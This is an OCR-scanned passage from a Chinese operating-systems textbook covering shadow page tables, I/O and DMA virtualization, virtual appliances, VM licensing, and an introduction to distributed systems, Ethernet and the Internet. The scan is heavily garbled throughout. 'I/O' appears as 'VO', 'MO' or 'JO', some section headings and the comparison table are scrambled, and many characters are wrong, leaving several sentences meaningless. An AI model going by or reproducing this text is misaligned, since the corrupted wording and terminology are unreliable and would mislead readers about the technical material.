在 ,假设 第 二 台 虚 拟 机 启动 ， 希 望 把 它 的 虚拟 页 面 4、5、6 分 别 映射 到 
物理 页 面 10、11、12， 并 加 载 指向 页 表 的 控制 寄存 器 。 管 理 程序 捕捉 
到 了 这 次 陷入 ， 但 是 它 会 做 什么 呢 ? 它 不 能 进行 这 次 映射 ， 因 为 物理 页 
面 10、11、12 正 在 使 用 。 它 可 以 找到 其 他 空间 页 面 ， 比 如 说 20、21、 
22 并 使 用 它们 ， 但 是 在 此 之 前 ， 它 需要 创建 一 个 新 的 页 表 完 成 虚拟 页 
面 4、5、6 到 物理 页 面 20、21、22 的 映射 。 如 果 还 有 其 他 的 虚拟 机 启 
动 ， 继 续 请 求 使 用 物理 页 面 10、11、12， 管 理 程序 也 必须 为 它 创建 一 
个 映射 。 总 之 ， 管 理 程序 必须 为 每 一 台 虚 拟 机 创建 一 个 影子 页 表 
(shadow page table) ， 用 以 实现 该 虚拟 机 使 用 的 虚拟 页 面 到 管理 程序 
分 配给 它 的 物理 页 面 之 间 的 映射 。 


但 更 糟糕 的 是 ， 每 次 客户 操作 系统 改变 它 的 页 表 ， 管 理 程序 必须 
相应 地 改变 其 影子 页 表 。 例 如 ， 如 采 客 户 操 作 系 统 将 虚拟 页 面 7 重 狐 映 
射 到 它 所 认为 的 物理 页 面 200 (不 再 是 物理 页 面 10 了 ) 。 管 理 程序 必须 
了 解 这 种 改变 。 问 题 是 客户 操作 系统 只 需要 写 内 存 束 可 以 完成 这 种 改 
变 。 由 于 不 需要 执行 敏感 指令 ， 管 理 程序 根本 束 不 知道 这 种 改变 ， 所 
以 就 不 会 更 新 它 的 由 实际 硬件 使 用 的 影子 页 表 。 


一 种 可 能 的 (也 很 笨拙 的 ) 解决 方式 是 ， 管 理 程序 监视 客户 虚拟 
内 存 中 你 存 顶 级 页 表 的 内 存 页 。 只 要 客户 操作 系统 试图 加 载 指 癌 该 内 
存 页 的 硬件 寄存 占 ， 管 理 程序 就 能 获得 相应 的 信息 ， 因 为 这 条 加 载 指 
令 是 敏感 指令 ， 它 会 引发 陷入 。 这 时 ， 管 理 程序 建立 一 个 影子 页 表 ， 


把 顶级 页 表 和 顶级 页 表 所 指向 的 二 级 页 表 设 置 成 只 读 。 接 下 来 客户 操 
作 系 统 只 要 试图 修改 它们 就 会 发 生 缺 页 异常 ， 然 后 把 控制 交 给 管理 程 
序 ， 由 管理 程序 来 分 析 指 令 序列 ， 了 解 客户 操作 系统 到 底 要 执行 什么 
样 的 操作 ， 并 据 此 更 新 影子 页 表 。 这 种 方法 并 不 好 ， 但 它 在 理论 上 是 
可 行 的 。 


在 这 方面 ， 将 来 的 VT 技 术 可 以 通过 硬件 实现 两 级 映射 从 而 提供 一 
些 帮助 。 硬 件 首 先 把 虚拟 页 面 映射 成 客户 操作 系统 所 认为 的 “物理 页 
面 ”， 然 后 再 把 它 《硬件 仍然 认为 它 是 虚拟 页 面 ) 映射 到 物理 地 址 衬 
间 ， 这 样 做 不 会 引起 陷入 。 通 过 这 种 方式 ， 页 表 不 必 再 被 标记 成 只 
读 ， 而 管理 程序 只 需要 提供 从 客户 的 虚拟 空间 到 物理 空间 的 映射 。 当 
虚拟 机 切换 时 ， 管 理 程序 改变 相应 的 映射 ， 这 与 普通 操作 系统 中 进程 
切换 时 系统 所 做 的 改变 是 相同 的 。 


在 准 虚 拟 化 的 操作 系统 中 ， 情 况 是 不 同 的。 这 时 ， 准 虚拟 化 的 客 
户 操 作 系统 知道 当 它 结 束 的 时 候 需 要 更 改进 程 页 表 ， 此 时 它 需 要 通知 
管理 程序 。 所 以 ， 它 前 先 彻 确 改变 页 表 ， 然 后 调用 管理 程序 例 程 来 通 
知 管理 程序 使 用 新 的 页 表 。 这 样 ， 当 且 仅 当 全 部 的 内 容 被 更 新 的 时 候 
才 会 进行 一 次 管理 例 程 调 用 ， 而 不 必 每 次 更 新 页 表 的 时 候 都 引发 一 次 
保护 故障 ， 很 明显 ， 效 率 会 高 很 多 。 


8.3.6 ”LO 设备 的 虚拟 化 


了 解 了 处 理 器 和 内 存 的 虚拟 化 ， 下 面 我 们 来 研究 一 下 VO 的 虚拟 

化 。 客 户 操作 系统 在 局 动 的 时 候 会 探测 硬件 以 找 出 当前 系统 中 都 连接 
了 哪 种 类 型 的 MO 设备 。 这 些 探测 会 陷入 到 管理 程序 。 那 么 管理 程序 会 
LUE? 一 种 方法 是 回 客 户 操作 系统 报告 设备 信息 ， 如 人 磁盘、 打印 
机 等 真实 存在 的 硬件 。 于 是 客户 操作 系统 加 载 相应 的 设备 驱动 程序 以 
使 用 这 些 设备 。 当 设备 续 动 程序 试图 进行 WO 操作 上 时， 它们 会 读 写 设备 
的 硬件 寄存 郁 。 这 些 指令 旦 敏感 指令 ， 将 会 陷入 到 管理 程序 ， 管 理 程 
序 根据 需要 从 硬件 中 读 取 或 向 硬件 中 写 入 所 需 的 数据 。 


但 是 ， 现 在 我 们 有 一 个 问题 。 每 一 个 客户 操作 系统 都 认为 它 拥 有 
全 部 的 磁盘 分 区 ， 而 同时 实际 上 虚拟 机 的 数量 比 磁 强 分 区 数 多 得 多 
(甚至 可 能 是 几 百 个 ) 。 溃 用 的 解决 方法 是 管理 程序 在 物理 磁盘 上 为 
每 一 个 虚拟 机 创建 一 个 文件 或 区 域 作为 它 的 物理 人 磁盘。 由 于 客 成 操作 
系统 试图 控制 真正 的 物理 磁盘 (如 管理 程序 所 见 ) ， 它 会 把 需要 访问 
的 磁盘 块 数 转换 成 相对 于 文件 或 区 域 的 偏 移 量 ， 从 而 完成 JO 操 作 。 


客户 操作 系统 正在 使 用 的 位 盘 也 许 跟 真 实 的 磁盘 不 同 。 例 如 ， 如 
果真 实 的 磁盘 是 带 有 新 接口 的 某 些 新 品牌 、 高 性 能 的 磁盘 (或 
RAID) ， 管 理 程序 会 告知 客户 操作 系统 它 拥 有 的 是 一 个 日 的 IDE 磁 
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件 不 做 改动 时 ， 可 以 使 用 这 种 技术 。 事 实 上 ， 虚 拟 机 对 硬件 设备 重 映 
味 的 能 力 证 实 VM/370 流 行 的 原因 : 公司 想 要 买 更 新 更 快 的 硬件 ， 但 是 
不 想 更 改 它 们 的 软件 。 虚 拟 技术 使 这 种 想法 成 为 可 能 。 


另 一 个 必须 解决 的 VO 问题 是 DMA 技 术 的 应 用 。DMA 技 术 使 用 的 
是 绝对 物理 内 存 地 址 。 我 们 希望 ， 管 理 程序 在 DMA 操 作 开 始 之 前 介 
入 ， 并 完成 地 址 的 转换 。 不 过 ， 带 有 IO MMU 的 硬件 出 现 了 ， 它 按照 
MMU 虚 拟 内 存 的 方式 对 MO 进行 虚拟 化 。 这 个 硬件 解决 了 DMA3 引 起 的 


问题 。 


另 一 种 处 理 MO 操 作 的 方法 是 让 其 中 一 个 虚拟 机 运行 标准 的 操作 系 
统 ， 并 把 其 他 虚拟 机 的 MO 请 求全 部 反射 给 它 去 处 理 。 当 准 虚 拟 化 技术 
得 到 运用 之 后 ， 这 种 方法 被 完善 了 ， 发 送 到 管理 程序 的 命令 只 需 表 明 
客户 操作 系统 需要 什么 (如 从 磁 强 1 中 读 取 第 1403 块 ， 而 不 必 发 送 一 
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的 角色 ， 指 出 客户 操作 系统 想 要 做 什么 事情 。Xen 使 用 这 种 方法 处 理 
IO 操作 ， 其 中 完成 7O 操 作 的 虚拟 机 称 为 domain0 ° 


在 WO 设备 虚拟 化 方面 ，II 型 管理 程序 相对 于 I 型 管理 程序 所 具备 的 
优势 在 于 : 箱 主 操作 系统 包含 了 所 有 连接 到 计算 机 上 的 所 有 怪异 的 WO 
设备 的 驱动 程序 。 当 应 用 程序 试图 访问 一 个 不 常见 的 1/O 设 备 时 ， 翻 译 


的 代码 可 以 调用 已 存在 的 驱动 程序 来 完成 相应 的 工作 。 但 是 对 I 型 管理 
程序 来 说 ， 它 或 者 目 身 包含 相应 的 续 动 程序 ， 或 者 调用 domain0 中 的 驱 
动 程序 ， 后 一 种 情况 与 答 主 操作 系统 很 相似 。 随 着 虚拟 技术 的 成 熟 ， 

将 来 的 硬件 也 许 会 让 应 用 程序 以 一 种 安全 的 方式 直接 访问 人 硬件， 
味 看 驱动 程序 可 以 直接 链接 到 应 用 程序 代码 或 者 作为 独立 的 用 户 空 间 
服务 ， 从 而 解决 VO 虚拟 化 方面 的 问题 。 


8.3.7 ket Te 


虚拟 机 为 长 期 困扰 用 户 (特别 是 使 用 开源 软件 的 用 户 ， 的 问题 提 
供 了 一 种 有 趣 的 解决 方案 ; 如 何 安 厄 新 的 应 用 程序 。 问 题 在 于 很 多 应 
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于 其 他 的 软件 包 等 等 。 而 且 ， 对 特定 版 本 的 编译 器 、 脚 本 语言 或 操作 
系统 也 可 能 有 依赖 关系。 


使 用 虚拟 机 技术 ， 一 个 软件 开发 人 员 能 够 仔细 地 创建 一 个 虚拟 
机 ， 狐 入 所 需 的 操作 系统 、 编 译 上 融 、 画 数 库 和 应 用 程序 代码 ， 组 成 一 
个 整体 来 运行 。 这 个 虚拟 机 映像 可 以 被 放 到 光盘 (CD-ROM) 或 网 站 
上 以 供用 户 安 姜 或 下 载 。 这 种 方法 意味 着 只 有 软件 开发 者 需要 了 解 所 
有 的 依赖 和 关系。 客户 得 到 的 是 可 以 正 闻 工作 的 完整 的 程序 包 ， 独 立 于 
他 们 正在 使 用 的 操作 系统 、 各 类 软件 、 已 安 冯 的 程序 包 和 辑 数 库 。 这 
些 被 包装 好 的 虚拟 机 通常 叫做 虚拟 工具 (virtual appliance) 。 


8.3.8 ”多核 处 理 机 上 的 虚拟 机 


虚拟 机 与 多 核 技术 的 结合 打开 了 一 个 全 新 的 世界 ， 在 这 个 世界 里 
可 以 在 软件 中 指定 可 用 的 处 理 机 数量 。 例 如 ， 如 果 有 四 个 可 用 的 核 ， 
每 个 核 最 多 可 以 文 持 八 个 虚拟 机 ， 若 有 和 需要， 一 个 单独 的 (桌面) 处 
理 絮 就 可 以 配置 成 32 结 点 的 多 机 系统 ， 但 是 根据 软件 的 需求 ， 它 可 以 
有 更 少 的 处 理 器 。 以 前 ， 对 于 一 个 软件 设计 者 来 说 ， 先 选择 所 需 的 处 
理 需 数量 ， 再 据 此 编写 代码 是 不 可 能 的 。 这 显然 代表 了 计算 技术 发 展 
的 新 阶段 。 


虽然 还 不 普 裔 ， 但 古 在 虚拟 机 之 间 是 可 能 实现 共 译 内 存 的 。 所 需 
要 完成 的 工作 整 古 将 物理 页 面 映射 到 多 个 虚拟 机 的 地 址 空间 当中 。 如 
果 能 够 做 到 的 话 ， 一 台 计 算 机 束 成 为 了 一 个 虚拟 的 多 处 理 机 。 由 于 多 
核 必 片上 所 有 的 核 共享 内 存 ， 因 此 一 个 四 核心 片 能 够 很 容易 地 按照 需 
要 配置 成 32 结 点 的 多 处 理 机 或 多 计算 机 系统 。 


EIR ` EWN ` 管理 程序 和 微 内 核 的 结合 将 从 根本 上 改变 人 们 对 
计算 机 系统 的 认 知 。 现 在 的 软件 不 能 应 对 这 些 想 法 : 程序 员 确 定 需要 
多 少 个 处 理 机 ， 这 些 处 理 机 是 应 该 组 成 一 个 多 计算 机 系统 还 是 一 个 多 
处 理 机 ， 以 及 在 某 种 情况 下 最 少 的 内 核 数 量 需 求 到 放生 多 少 。 将 来 的 
软件 将 处 理 这 些 问 题 。 


8.3.9 授权 问题 


大 部 分 软件 生 基 于 每 个 处 理 硕 授权 的 。 换 名 话说 ， 当 你 购买 了 一 
款 程 序 时 ， 你 只 有 权 在 一 个 处 理 絮 上 运行 它 。 这 个 合同 允许 你 在 同一 
台 物 理 机 上 的 多 个 虚拟 机 中 运行 该 软件 吗 ? 在 某 种 程度 上 ， 很 多 软件 
商 不 知道 应 该 怎么 办 。 


如 果菜 些 公司 获得 授权 可 以 同时 在 n 台 机 器 上 运行 软件 ， 问 题 束 会 
更 糟糕 ， 符 别 是 当 虚 拟 机 按照 需要 不 断 产生 和 消亡 的 时 候 。 


在 某 些 情况 下 ， 软 件 商 在 许可 证 (license) 中 加 入 明确 的 条 款 ， 
禁止 在 虚拟 机 或 未 授权 的 虚拟 机 中 使 用 该 软件 。 这 些 限制 在 法 峙 上 是 
人 否 有 效 ， 以 及 用 户 对 此 的 反应 还 有 竺 考察。 


8.4 分布 式 系统 


到 此 为 止 有 关 多 处 理 机 、 多 计算 机 和 虚拟 机 的 讨论 束 结 束 了 ， 现 
在 应 该 转向 最 后 一 种 多 处 理 机 系统 ， 即 分 布 式 系统 (distributed 
system) 。 这 些 系统 与 多 计算 机 类 似 ， 每 个 万 点 都 有 上 自己 的 私有 存储 
器 ， 整 个 系统 中 没有 共享 的 物理 存储 器 。 但 是 ， 分 布 式 系统 与 多 计算 
HLA, FE EIME ° 


自 完 ,一 人 台 多 计算 机 的 市 点 通常 有 CPU、RAM、 网 卡 ， 可 能 还 有 
用 于 分 页 的 硬盘。 与 之 相反 ， 分 布 式 系统 中 的 每 个 太 扣 都 是 一 台 完 整 
的 计算 机 ， 带 有 全 部 的 外 部 设备 。 其 次 ， 一 台 多 计算 机 的 所 有 市 点 
般 就 在 一 个 房间 里 ， 这 样 它们 可 以 通过 专门 的 高 速 网 络 通信 ， 而 分 布 
式 系统 中 的 节点 则 可 能 分 散在 全 世界 范围 内 。 最 后 ， 一 台 多 计算 机 的 
所 有 节点 运行 同样 的 操作 系统 ， 共 享 一 个 文件 系统 ， 并 处 在 一 个 共同 
的 管理 之 下 ， 而 一 个 分 布 式 系统 的 节点 可 以 运行 不 同 的 操作 系统 ， 每 
个 节点 有 上 自己 的 文件 系统 ， 并 且 处 在 不 同 的 管理 之 下 。 一 个 典型 的 多 
计算 机 的 例子 如 一 个 公司 或 一 所 大 学 的 一 个 房间 中 用 于 诸如 药物 建 模 
等 工作 的 512 个 节点 ， 而 一 个 典型 的 分 布 式 系统 包括 了 通过 Internet 松 散 
协作 的 上 千 台 机 器 。 在 图 8-29 中 ， 对 多 人 处理 机 、 多 计算 机 和 分 布 式 系统 
就 上 述 各 点 进行 了 比较 。 


项 目 多 处 理 机 多 计算 机 ee 


节点 配置 | CPU CPU、RAM、 网 络 接口 | 完整 的 计算 机 
节点 外 设 | 全 部 共享 | ere TEETAR | 每 个 节点 全 套 外 设 
位置 | 同一 机 箱 | 同一 房间 | 可 能 全 球 
ara [FRAM | 专用 互 连 | 传统 网 络 
操作 系统 | 一 个 , 共享 | 多 个 ,相同 | 可 能 都 不 相同 
文件 系统 O | 一 个 ,共享 个 , 共享 ”| 每 个 节点 自 有 
管理 o | 一 不 机 构 个 机 构 多 个 机 构 - 


Al 8-29 三 类 多 CPU 系统 的 比较 


通过 这 个 表 可 以 清楚 地 看 到 ， 多 计算 机 处 于 中 间 位 置 。 于 是 一 个 
有 趣 的 问题 束 是 : “多 计算 机 二 更 像 多 处 理 机 还 生 更 像 分 布 式 系 
统 ? "很 奇怪 ， 答 案 取 决 于 你 的 角度 。 从 技术 角度 来 看 ， 多 处 理 机 有 共 
享 存储 器 而 其 他 两 类 没有 。 这 个 差别 导致 了 不 同 的 程序 设计 模式 和 不 
同 的 思考 方式 。 但 是 ， 从 应 用 角度 来 看 ， 多 处 理 机 和 多 计算 机 都 不 过 
是 在 机 房 中 的 大 设备 机 架 (rack) 罢了 ， 而 在 全 部 依靠 nternet 连 接 计算 
机 的 分 布 式 系统 中 显然 通信 要 多 于 计算 ， 并 且 以 不 同 的 方式 使 用 着 。 


在 某 种 程度 上 ， 分 布 式 系统 中 计算 机 的 松散 耦合 既是 优点 又 是 缺 
点 。 它 之 所 以 是 优点 ， 和 是 因为 这 些 计算 机 可 用 在 各 种 类 型 的 应 用 之 
中 ， 但 它 也 是 缺点 ， 因 为 它 由 于 缺少 共同 的 压 层 模型 而 使 得 这 些 应 用 
程序 很 难 编程 实现 。 


典型 的 Internet 应 用 有 远程 计算 机 访问 (使 用 telnet、ssh 和 和 
rlogin) 、 远 程 信息 访问 (使 用 万 维 网 (World Wide Web) 和 FTP， 即 
文件 传输 协议 ) 、 人 际 通信 (使 用 e-mail 和 聊天 程序 ) 以 及 正在 浮现 的 


许多 应 用 〈 例 如 ， 电 子 商务 、 远 程 医疗 以 及 远程 教育 等 ) 。 所 有 这 些 
应 用 市 来 的 问题 是 ， 每 个 应 用 都 得 重新 开发 。 例 如 ，e-mail、FTP 和 万 
维 网 基本 上 痢 是 将 文件 从 A 扣 移 动 到 为 一 个 点 B， 但 是 每 一 种 应 用 都 有 
目 己 的 方式 从 事 这 项 工作 ， 完 全 按照 目 己 的 命名 规则 、 传 输 协议 、 复 
制 技术 以 及 其 他 等 。 尽 管 许多 Web 浏 览 硕 对 普通 用 户 隐 藏 了 这 些 差别 ， 
但 是 的 层 机 制 仍 然 是 完全 不 同 的 。 在 用 户 界面 级 隐藏 这 些 差 别 束 像 有 
一 个 人 在 一 家 提供 全 面 服务 的 旅行 社 的 Web 站 点 中 预订 了 从 纽约 到 有 旧 金 
山 的 旅行 ， 后 来 发 现 她 所 购买 的 只 不 过 是 一 张 飞机 票 、 一 张 火车 票 或 
者 一 张 汽 车 票 而 已 。 


分 布 式 系统 添加 在 其 底层 网 络 上 的 是 一 些 通用 范 型 〈 模 型 ) ， 它 
们 提供 了 一 种 统一 的 方法 来 观察 整个 系统 。 分 布 式 系统 想 要 做 的 十， 
将 松散 连接 的 大 量 机 器 转化 为 基于 一 种 概念 的 一 臻 系统。 这 些 范 型 有 
的 比较 简单 ， 而 有 的 是 很 复杂 的 ， 但 古 其 思想 则 总 是 提供 某 些 东 西 用 


来 统一 整个 系统 。 


在 上 下 文 稍 有 差别 的 情形 下 ， 统 一 范例 的 一 个 简单 例子 可 以 在 
UNIX 中 找到 。 在 UNIX 中 ， 所 有 的 IO 设备 被 构造 成 像 文件 一 样 。 对 键 
副 、 打 印 机 以 及 串 行 通信 线 等 都 使 用 相同 的 方式 和 相同 的 原 语 进 行 操 
作 ， 这 样 ， 与 保持 原 有 概念 上 的 差异 相 比 ， 对 它们 的 处 理 更 为 容易 。 


分 布 式 系统 面 对 不 同 硬件 和 操作 系统 实现 某 种 统一 性 的 途径 是 ， 
在 操作 系统 的 顶部 添加 一 层 软 件 。 这 层 软 件 称 为 中 间 件 


(middleware) ， 如 图 8-30 所 示 。 这 层 软 件 提供 了 一 些 特定 的 数据 结构 
和 操作 ， 从 而 允许 散布 的 机 器 上 的 进程 和 用 户 用 一 致 的 方式 互 操作 。 


应 用 的 公共 基础 


[ 
中 间 件 中 间 件 


中 间 件 


图 8-30 在 分 布 式 系统 中 中 间 件 的 地 位 


在 某 种 意义 上 ， 中 间 件 像 古 分 布 式 系统 的 操作 系统 。 这 就 是 为 什 
么 在 一 本 关于 操作 系统 的 书 中 讨论 中 间 件 的 原因 。 不 过 另 一 方面 ， 中 
间 件 又 不 是 真正 的 操作 系统 ， 所 以 我 们 对 中 间 件 有 关 的 讨论 不 会 过 于 
详细 。 较 为 全 面 的 关于 分 布 式 系统 的 讨论 可 参见 《分 布 式 系统 》 
(Distributed Systems，Tanenbaum 和 van Steen, 2006) 。 在 本 章 余下 的 
部 分 ， 首 先 我 们 将 快速 考察 在 分 布 式 系统 (下层 的 计算 机 网 络 ) 中 使 
用 的 硬件 ， 然 后 是 其 通信 软件 (网 络 协 议 ) 。 接 着 我 们 将 考虑 在 这 些 
系统 中 的 各 种 范 型 。 


8.4.1 网 络 便 件 


分 布 式 系统 构建 在 计算 机 网 络 的 上 层 ， 所 以 有 必要 对 计算 机 网 络 
这 个 主题 做 个 简要 的 介绍 。 网 络 主要 有 两 种 ， 和 覆盖 一 座 建筑 物 或 一 个 
校园 的 LAN (局 域 网 ，Local Area Networks) 和 可 用 于 城市 、 乡 村 甚至 
世界 范围 的 WAN (广域网 ，Wide Area Network) 。 最 重要 的 LAN 类 型 
是 以 太 网 (Ethernet) ， 所 以 我 们 把 它 作 为 LAN 的 范例 来 考察 。 至 于 
WAN 的 例子 ， 我 们 将 考察 Internet， 尽 管 在 技术 上 Internet 不 是 一 个 网 
络 ， 而 是 上 千 个 分 离 网 络 的 联邦 。 但 是 ， 就 我 们 的 目标 而 言 ， 把 
Internet 视 为 一 个 WAN 就 足够 了 。 


1. 以 太 网 (Ethernet) 


经 典 的 以 太 网 ， 在 IEEE802.3 标 准 中 有 具体 描述 ， 由 用 来 连接 若干 
计算 机 的 同 轴 电 缆 组 成 。 这 些 电 缆 之 所 以 称 为 以 太 网 (Ethernet) ， 是 
源 于 发 光 以 太 ， 人 们 曾经 认为 电磁 辐射 是 通过 以 太 传播 的 。 (19 世 纪 
英国 物理 学 家 James Clerk Maxwell 发 现 了 电磁 辐射 可 用 一 个 波动 方程 描 
述 ， 那 时 科学 家 们 假设 空中 必须 充满 了 某 些 以 太 介 质 ， 而 电磁 辐射 则 
在 该 以 太 介质 中 传播 。 不 过 在 1887 年 著名 的 Michelson-Morley 实 验 中 ， 
科学 家 们 并 未 能 探测 到 以 太 的 存在 ， 在 这 之 后 物理 学 家 们 才 意 识 到 电 
磁 辐 射 可 以 在 真空 中 传播 ) 。 


在 以 太 网 的 非常 早 的 第 一 个 版 本 中 ， 计 算 机 与 外 了 半截 孔 的 电 顷 
通过 一 端 固定 在 这 些 筷 中 而 为 一 端 与 计算 机 连接 的 电线 相连 接 。 它 们 
被 称 为 插入 式 分 接头 (vampire tap) ， 如 图 8-31a 中 所 示 。 可 是 这 种 接 
头 很 难 接 正 确 ， 所 以 没 过 多 久 ， 殊 换 用 更 合适 的 接头 了 。 无 论 起 样 ， 
从 电气 上 来 看 ， 所 有 的 计算 机 都 被 连接 起 来 ， 在 网 络 接口 卡 上 的 电线 
仿佛 是 被 晨 上 一 样 。 


ae 
计算 机 


下 以 大 网 > 


以 太 网 
a) b) 


图 8-31 aR ARW; DIRAK 


要 在 以 太 网 上 发 送 包 ， 计 算 机 首先 要 侦 听 电缆 ， 看 看 是 否 有 其 他 
的 计算 机 正在 进行 传输 。 如 果 没 有 ， 这 人 台 计算 机 便 开 始 传送 一 个 包 ， 
其 中 有 一 个 短 包头 ， 随 后 是 0 到 1500 字 节 的 有 效 信息 载荷 (payload) 。 
如 果 电缆 正在 使 用 中 ， 计 算 机 只 是 等 待 直到 当前 的 传输 结束 ， 接 着 该 
台 计算 机 开始 发 送 。 


如 采 两 台 计算 机 同时 开始 发 送 ， 束 会 导致 冲突 发 生 ， 两 台 机 需 都 
做 检测 。 两 机 都 用 中 断 其 传输 来 啊 应 检测 到 的 碰撞 ， 然 后 在 等 竺 一 个 


从 0 到 T 微 秒 的 随机 时 间 段 之 后 ， 再 重新 开始 。 如 有 果 再 一 次 冲突 发 生 ， 

所 有 碰撞 的 计算 机 进入 0 到 2T 微 秒 的 随机 等 待 。 然 后 再 尝试 。 在 每 个 后 
续 的 冲突 中 ， 最 大 等 竺 间隔 加 倍 ， 用 以 减少 更 多 硕 擅 的 机 会 。 这 个 算 
法 称 为 二 进 制 指数 补偿 算法 (binary exponential backoff) 。 在 前 面 有 关 
减少 锁 的 轮 询 开销 中 ， 我 们 曾 介绍 过 这 种 算法 。 


以 太 网 有 其 最 大 电缆 长 度 限制 ， 以 及 可 连接 的 最 多 的 计算 机 人 台数 
限制 。 要 想 超过 其 中 一 个 的 限制 ， 束 要 在 一 座 大 建筑 物 或 校园 中 连接 
多 个 以 太 网 ， 然 后 用 一 种 称 为 桥接 器 (bridge) 的 设备 把 这 些 以 太 网 连 
接 起 来 。 桥 接 紫 允许 信息 从 一 个 以 太 网 传递 到 男 一 个 以 太 网 ， 而 源 在 
桥接 器 的 一 边 ， 目 的 地 在 桥接 器 的 另 一 边 。 


为 了 避免 碰撞 问题 ， 现 代 以 太 网 使 用 交换 机 (switch) ， 如 图 8- 
31b 所 示 。 每 个 交换 机 有 邦 干 个 端口 ， 一 个 端口 用 于 连接 一 台 计 算 机 、 
一 个 以 太 网 或 男 一 个 交换 机 。 当 一 个 包 成 功 地 避 开 所 有 的 碰撞 并 到 达 
交换 机 时 ， 它 被 缓存 在 交换 机 中 并 送 往 另 一 个 通 往 目 的 地 机 夯 的 站 
口 。 知 能 息 受 较 大 的 交换 机 成 本 ， 可 以 使 每 台 机 需 都 拥有 目 己 的 端 
口 ， 从 而 消除 挥 所 有 的 碰撞 。 作 为 一 种 妥协 方案 ， 在 每 个 端口 上 连接 
少量 的 计算 机 还 是 有 可 能 的 。 在 图 8-31b 中 ， 一 个 经 典 的 由 多 个 计算 机 
组 成 以 太 网 连接 到 交换 机 的 一 个 端口 中 ， 这 个 以 太 网 中 的 计算 机 通过 
插入 式 分 接头 连接 在 电 绕 上 。 


2. 因 特 网 


Internet HARPANET (美国 国防 部 高 级 研究 项 目 车 资助 的 一 个 实验 
性 的 分 组 交换 网 络 ) 演化 而 来 。 它 自 1969 年 12 月 起 开始 运行 ， 由 三 台 
在 加 州 的 计算 机 和 一 台 在 犹他 州 的 计算 机 组 成 。 当 时 正 值 冷战 的 顶峰 
时 期 ， 它 被 设计 为 一 个 高 度 容错 的 网 络 ， 在 核弹 直接 击 中 网 络 的 多 个 
部 分 时 ， 该 网 络 将 能 够 通过 自动 改换 已 死亡 机 器 周边 的 路 由 ， 继 续 保 
持 军 事 通 信 的 中 继 。 


ARPANET 在 20 世 纪 70 年 代 迅 速 地 成 长 ， 结 果 拥 有 了 上 百 台 计算 
机 。 接 着 ， 一 个 分 组 无 线 网 络 、 一 个 卫星 网 络 以 及 成 千 的 以 太 网 都 联 
在 了 该 网 络 上 ， 从 而 变 成 为 网 络 的 联邦 ， 即 我 们 今天 所 看 到 的 
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Intemet 包 括 了 两 类 计算 机 ， 主 机 和 路 由 器 。 主 机 (host) 有 PC 
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人 或 公司 所 有 且 项 望 与 Internet 连 接 的 计算 机 。 路 由 器 (router) 是 专用 
的 交换 计算 机 ， 它 在 许多 进 线 中 的 一 条 线 上 接收 进来 的 包 ， 并 在 许多 
个 出 口 线 中 的 一 条 线 上 按照 其 路 径 发 送 包 。 路 由 器 类 似 于 图 8-31b 中 的 
交换 机 ， 但 是 路 由 器 与 这 种 交换 机 也 是 有 差别 的 ， 这 些 差别 就 不 在 这 
里 讨论 了 。 在 大 型 网 络 中 ， 路 由 璐 互相 连接 ， 每 全 路 由 瑚 都 通过 线 线 
或 光 顷 连接 到 其 他 的 路 由 亏 或 主机 上 “。 电 话 公 司 和 互联 网 服务 提供 商 
(Internet Service Providers，ISP) 为 其 客户 运行 大 型 的 全 国 性 或 全 球 
PETES EH ae BY 2 ° 


图 8-32 展 示 了 Internet 的 一 部 分 。 在 图 的 顶部 是 其 主干 网 
(backbone) 之 一 ， 通 常 由 主干 网 操作 员 管 理 。 它 包括 了 大 量 通过 宽带 
光纤 连接 的 路 由 器 ， 同 时 连接 着 其 他 (竞争 ) 电话 公司 运行 管理 的 主 
干 网 。 除 了 电话 公司 为 维护 和 测试 所 需 运 行 的 机 器 之 外 ， 通 党 没有 主 
机 直接 联 在 主干 网 上 。 


主干 网 局 带宽 光纤 
x 


地 区 网 络 


aa? ISP 侧 的 路 由 器 
ui 到 家 用 PC 的 
拨号 电话 线 


\ 


家 用 PC 


光纤 或 铜 线 路 由 器 


本 地 路 由 器 一 ~<— fH EDL 


N uam 
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地 区 网 络 和 ISP 的 路 由 器 通过 中 等 速度 的 光纤 连接 到 主干 网 上 。 依 
次 ， 每 个 配备 路 由 右 的 公司 以 太 网 连接 到 地 区 网 络 的 路 由 右上 。 而 ISP 
的 路 由 器 则 被 连接 到 供 ISP 客 户 们 使 用 的 调制 解 调 器 汇集 器 (bank) 


上 上。 按照 这 种 方式 ， 在 Intermmet 上 的 每 台 主 机 至 少 拥有 通 往 其 他 主机 的 
一 条 路 径 ， 而 且 每 台 经 党 拥有 多 条 通 往 其 他 主机 的 路 径 。 


在 Internet 上 的 所 有 通信 都 以 包 (packet) 的 形式 传送 。 每 个 包 在 其 
内 部 携带 着 目的 地 的 地 址 ， 而 这 个 地 址 是 供 路 由 器 使 用 的 。 当 一 个 包 
来 到 某 个 路 由 器 时 ， 该 路 由 器 抽取 目的 地 地 址 并 在 一 个 表格 (部 分 ) 
中 进行 查询 ， 以 找 出 用 哪 根 出 口 线 发 送 该 包 以 及 发 送 到 哪个 路 由 器 。 
这 个 过 程 不 断 重 复 ， 直 到 这 个 包 到 达 目 的 主机 。 路 由 表 是 高 度 动态 
的 ， 并 且 随 着 路 由 器 和 链 路 的 损坏 、 恢 复 以 及 通信 条 件 的 变化 在 连续 
不 断 地 更 新 。 


8.4.2 ”网 络 服务 和 协议 


所 有 的 计算 机 网 络 都 为 其 用 户 (主机 和 进程 ， 提 供 一 定 的 服务 ， 
这 种 服务 通过 某 些 关于 合法 消 妃 交换 的 规则 加 以 实现 。 下 面 将 简要 地 


叙述 这 些 内 容 。 


1. 网 络 服务 


计算 机 网 络 为 使 用 网 络 的 主机 和 进程 提供 服务 。 面 向 连接 的 服务 
是 对 电话 系统 的 一 种 模仿 。 比 如 ， 帮 要 同 菜 人 谈话 ， 则 要 先 拿 起 听 
简 ， 拨 出 号 码 ， 说 话 ， 然 后 挂 挥 。 类 似 地 ， 要 使 用 面向 连接 的 服务 ， 
服务 用 户 要 先 建立 一 个 连接 ， 使 用 该 连接 ， 然 后 释放 该 连接 。 一 个 连 
接 的 基本 作用 则 像 一 根 管道 : 发 送 者 在 一 端 把 物品 (信息 位 ) 推 入 管 
道 ， 而 接收 者 则 按照 相同 的 顺序 在 管道 的 另 一 端 取 出 它们 。 


相反 ， 无 连接 服务 则 十 对 邮政 系统 的 一 种 模 念 。 每 个 消息 ( 信 
件 ) 携带 了 完整 的 目的 地 地 址 ， 与 所 有 其 他 消息 相 独 立 ， 每 个 消息 有 
